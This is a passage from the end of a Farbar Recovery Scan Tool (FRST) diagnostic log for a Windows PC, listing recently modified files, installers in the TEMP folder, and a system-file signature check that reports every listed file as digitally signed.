2017-04-25 19:32 - 2016-03-09 16:40 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2017-04-22 17:13 - 2009-07-14 07:32 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-04-21 13:21 - 2016-03-09 17:46 - 00044931 __RSH C:\ProgramData\ntuser.pol
2017-04-21 13:18 - 2016-03-09 16:25 - 00000744 _____ C:\WINDOWS\system32\config\netlogon.ftl
2017-04-21 12:37 - 2016-03-11 13:27 - 00141288 _____ C:\Users\fundowic\AppData\Local\GDIPFONTCACHEV1.DAT
2017-04-19 21:10 - 2016-03-11 10:02 - 00000000 ____D C:\Users\fundowic\AppData\Local\Adobe
2017-04-19 20:38 - 2009-07-14 06:45 - 00495144 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-04-18 14:45 - 2016-03-09 16:40 - 00000000 ____D C:\ProgramData\Adobe
2017-04-18 14:45 - 2016-03-09 16:40 - 00000000 ____D C:\Program Files (x86)\Adobe
2017-04-18 14:20 - 2015-03-04 11:36 - 00000000 ____D C:\WINDOWS\ccmcache
2017-04-18 13:35 - 2016-03-09 17:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pulse Secure
2017-04-17 15:55 - 2016-06-11 20:39 - 00000000 ____D C:\Users\fundowic\AppData\Roaming\vlc
2017-04-16 10:31 - 2016-03-26 19:47 - 00004476 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task

==================== Files in the root of some directories =======

2016-03-14 09:25 - 2013-10-11 12:47 - 12566528 _____ () C:\Program Files\pgadmin3.msi
2016-03-14 08:53 - 2010-02-18 12:58 - 1165712 _____ () C:\Program Files\SQLTools_15b10D.exe
2016-03-11 10:18 - 2016-03-11 10:18 - 0007611 _____ () C:\Users\fundowic\AppData\Local\Resmon.ResmonCfg

Some files in TEMP:
====================
2016-03-11 11:10 - 2016-03-11 11:10 - 2033976 _____ () C:\Users\fundowic\AppData\Local\Temp\dsHostCheckerSetup.exe
2015-08-05 16:41 - 2015-08-05 16:41 - 0185968 _____ (Pulse Secure, LLC) C:\Users\fundowic\AppData\Local\Temp\dsNCInst64.exe
2016-10-24 02:55 - 2016-10-24 02:55 - 0737856 _____ (Oracle Corporation) C:\Users\fundowic\AppData\Local\Temp\jre-8u111-windows-au.exe
2016-05-28 01:56 - 2016-05-28 01:56 - 0739904 _____ (Oracle Corporation) C:\Users\fundowic\AppData\Local\Temp\jre-8u91-windows-au.exe
2016-03-11 11:12 - 2016-03-11 11:12 - 2458248 _____ () C:\Users\fundowic\AppData\Local\Temp\neoNCSetup64.exe
2016-05-12 08:39 - 2016-05-12 08:39 - 4203840 _____ () C:\Users\fundowic\AppData\Local\Temp\npp.6.9.1.Installer.exe
2016-03-11 10:01 - 2007-06-11 13:39 - 0118784 _____ (TELEATLAS) C:\Users\fundowic\AppData\Local\Temp\TAWiMAS.exe
2015-08-03 01:58 - 2015-08-03 01:58 - 0118784 _____ () C:\Users\fundowic\AppData\Local\Temp\xmlUpdater.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-05-03 00:15

==================== End of FRST.txt ============================